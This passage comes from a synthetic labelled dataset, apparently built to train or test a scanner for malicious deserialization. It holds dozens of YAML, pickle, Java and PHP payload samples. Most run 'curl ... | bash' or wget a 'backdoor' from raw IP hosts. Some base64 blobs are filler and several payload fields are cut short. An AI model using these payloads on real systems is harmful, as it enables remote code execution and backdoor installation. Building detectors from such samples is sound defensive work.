'/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://214.219.65.217/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://71.36.38.33/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00085", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:71:\"0bZrS8sE+rJwIoj/RhV5G8MermJB6yjLpumm59j7\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://248.132.197.61/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:71:\"0bZrS8sE+rJwIoj/RhV5G8MermJB6yjLpumm59j7\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://248.132.197.61/bd\")"}}]} {"id": "synth_malicious_deserialization_00086", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://237.68.10.168/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://112.197.38.245/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://237.68.10.168/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://112.197.38.245/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00087", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://202.60.23.131/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://151.184.226.192/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://202.60.23.131/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://151.184.226.192/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00088", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('PeT411X0txilxS3nQ5qKcQ6r5Dz0Rd15VjCkZYBQwBdgc4upo+vfZO7m9GFA')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://71.81.22.237/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('PeT411X0txilxS3nQ5qKcQ6r5Dz0Rd15VjCkZYBQwBdgc4upo+vfZO7m9GFA')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00089", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://212.215.231.63/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://212.215.231.63/shell\")"}}]} {"id": "synth_malicious_deserialization_00090", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('GJiQfK9a2POyVS346SiOlcQCX3s/DQ2UZzVb6+OG+zARWydkyDEFyd8z2cPO')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://182.75.88.39/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('GJiQfK9a2POyVS346SiOlcQCX3s/DQ2UZzVb6+OG+zARWydkyDEFyd8z2cPO')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00091", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:24:\"wNcOMZgh0NCzKTZyP6K999m01gDJWK7MnX9WrHia\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://77.212.52.249/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:24:\"wNcOMZgh0NCzKTZyP6K999m01gDJWK7MnX9WrHia\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://77.212.52.249/bd\")"}}]} {"id": "synth_malicious_deserialization_00092", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://130.246.14.218/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://130.246.14.218/shell\")"}}]} {"id": "synth_malicious_deserialization_00093", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://16.113.231.93/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://110.22.74.82/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://16.113.231.93/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://110.22.74.82/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00094", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('/GI47im/dcZExAEj2L/GyU7mXmq3quyZCbSx5MnXD/a97Kwd9lBpak5+tQwB')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://81.65.48.215/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('/GI47im/dcZExAEj2L/GyU7mXmq3quyZCbSx5MnXD/a97Kwd9lBpak5+tQwB')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00095", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('kj3aserqsC1hSsOZjb2jUfEEF8yGCshIG55wXlRYDu/BrNKpifP8cvTC6otc')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://201.56.217.90/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('kj3aserqsC1hSsOZjb2jUfEEF8yGCshIG55wXlRYDu/BrNKpifP8cvTC6otc')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00096", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('yuEpPvArCmhLJEVX8D+SPrynxR3l7REFakzXG+kJtcoUGk+KyzfgbSfhpGEe')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://62.177.120.38/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('yuEpPvArCmhLJEVX8D+SPrynxR3l7REFakzXG+kJtcoUGk+KyzfgbSfhpGEe')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00097", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://165.122.137.211/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://165.122.137.211/shell\")"}}]} {"id": "synth_malicious_deserialization_00098", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://175.122.91.220/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://118.188.168.209/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://175.122.91.220/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://118.188.168.209/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00099", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:44:\"K7ps6pDlSDyNoCu9Q0xaOWiYkNamM+w+i+mZKcYS\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://141.6.122.146/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:44:\"K7ps6pDlSDyNoCu9Q0xaOWiYkNamM+w+i+mZKcYS\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://141.6.122.146/bd\")"}}]} {"id": "synth_malicious_deserialization_00100", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://144.166.136.106/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://252.203.51.149/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://144.166.136.106/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://252.203.51.149/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00101", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://73.77.248.142/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://73.77.248.142/shell\")"}}]} {"id": "synth_malicious_deserialization_00102", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://245.54.87.92/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://55.10.31.127/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://245.54.87.92/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://55.10.31.127/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00103", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://152.79.60.104/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://105.146.49.101/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://152.79.60.104/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://105.146.49.101/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00104", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://29.175.222.31/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://200.26.202.79/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://29.175.222.31/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://200.26.202.79/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00105", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('Z9AxTmVCCQM1TsVF3Ag6g9ETr0m7wgnSaLnwuu7ixzYvgAxrSbvbs7DxA5y0')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://252.195.66.120/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Z9AxTmVCCQM1TsVF3Ag6g9ETr0m7wgnSaLnwuu7ixzYvgAxrSbvbs7DxA5y0')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00106", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:55:\"knq6n7OarCf6RuxDy7MRB7aV2e7Cz9mZvvEgyvu0\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://89.50.165.201/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:55:\"knq6n7OarCf6RuxDy7MRB7aV2e7Cz9mZvvEgyvu0\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://89.50.165.201/bd\")"}}]} {"id": "synth_malicious_deserialization_00107", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://153.164.200.15/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://153.164.200.15/shell\")"}}]} {"id": "synth_malicious_deserialization_00108", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:48:\"eWSIn2BmGddGPA6Ev0D2Z789p3p/7B6tYPwhWMkv\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://183.131.239.127/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:48:\"eWSIn2BmGddGPA6Ev0D2Z789p3p/7B6tYPwhWMkv\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://183.131.239.127/bd\")"}}]} {"id": "synth_malicious_deserialization_00109", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('7jlXgB4aT1DAgutY/ePtKp/W2aTML3DIjXyp9Hc7zoQewtuJ+SDmxQ0fkrWQ')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://85.242.79.225/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('7jlXgB4aT1DAgutY/ePtKp/W2aTML3DIjXyp9Hc7zoQewtuJ+SDmxQ0fkrWQ')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00110", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('UzvSqXQrhwBdaPs3opgquZaUreYNw4T1luDfQcIkJPZhJct8SctHstWsx8qt')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://17.134.135.89/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('UzvSqXQrhwBdaPs3opgquZaUreYNw4T1luDfQcIkJPZhJct8SctHstWsx8qt')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00111", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://26.156.40.240/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://174.93.75.61/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://26.156.40.240/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://174.93.75.61/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00112", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('nVWI8KFYKmc7GYLbk+rU2wRRRvZKn2gk9OZZ8yoRRNnASVl2cY1yCpYh9Xp4')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://238.149.142.18/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('nVWI8KFYKmc7GYLbk+rU2wRRRvZKn2gk9OZZ8yoRRNnASVl2cY1yCpYh9Xp4')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00113", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('/sfoCLiG4yPd9nWNBa8IkJf/LPTJ8puvTbE/hJktLuHOKx5VTzwI9lT+5VZv')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://55.144.1.233/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('/sfoCLiG4yPd9nWNBa8IkJf/LPTJ8puvTbE/hJktLuHOKx5VTzwI9lT+5VZv')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00114", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://151.243.188.27/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://121.30.180.96/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://151.243.188.27/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://121.30.180.96/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00115", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:32:\"X1Ftl0C08UfOU55KSp4E/fM94Ub17SkW4wZ0GcPE\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://134.148.15.194/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:32:\"X1Ftl0C08UfOU55KSp4E/fM94Ub17SkW4wZ0GcPE\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://134.148.15.194/bd\")"}}]} {"id": "synth_malicious_deserialization_00116", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://165.47.16.29/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://197.59.153.134/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://165.47.16.29/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://197.59.153.134/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00117", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://124.63.176.210/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://113.16.70.168/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://124.63.176.210/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://113.16.70.168/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00118", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://234.128.155.224/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://191.118.125.117/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://234.128.155.224/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://191.118.125.117/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00119", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('UEOTjl/fm3Vo55aPPZn/BeMatpJis1sKmR06oHfQpaPVve4MHxbYKAuF+P8S')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://31.219.246.182/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('UEOTjl/fm3Vo55aPPZn/BeMatpJis1sKmR06oHfQpaPVve4MHxbYKAuF+P8S')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00120", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://29.191.111.122/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://29.191.111.122/shell\")"}}]} {"id": "synth_malicious_deserialization_00121", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://217.195.84.89/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://199.92.39.91/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://217.195.84.89/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://199.92.39.91/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00122", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://169.188.22.4/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://169.188.22.4/shell\")"}}]} {"id": "synth_malicious_deserialization_00123", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://235.16.101.64/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://235.16.101.64/shell\")"}}]} {"id": "synth_malicious_deserialization_00124", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('bDJPBzvZPacmHCUjm0crGYqEFnHaXDtwGNPk5dj4lHWFVyvT9aAU0afCD7lq')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://20.176.56.93/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('bDJPBzvZPacmHCUjm0crGYqEFnHaXDtwGNPk5dj4lHWFVyvT9aAU0afCD7lq')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00125", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://186.136.29.17/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://186.136.29.17/shell\")"}}]} {"id": "synth_malicious_deserialization_00126", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('skDxloR3I7te27EypaKom1RXUWTZDRuuzMwzok5kYZLqvjzVh4vis0FyUetB')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://210.194.111.70/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('skDxloR3I7te27EypaKom1RXUWTZDRuuzMwzok5kYZLqvjzVh4vis0FyUetB')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": 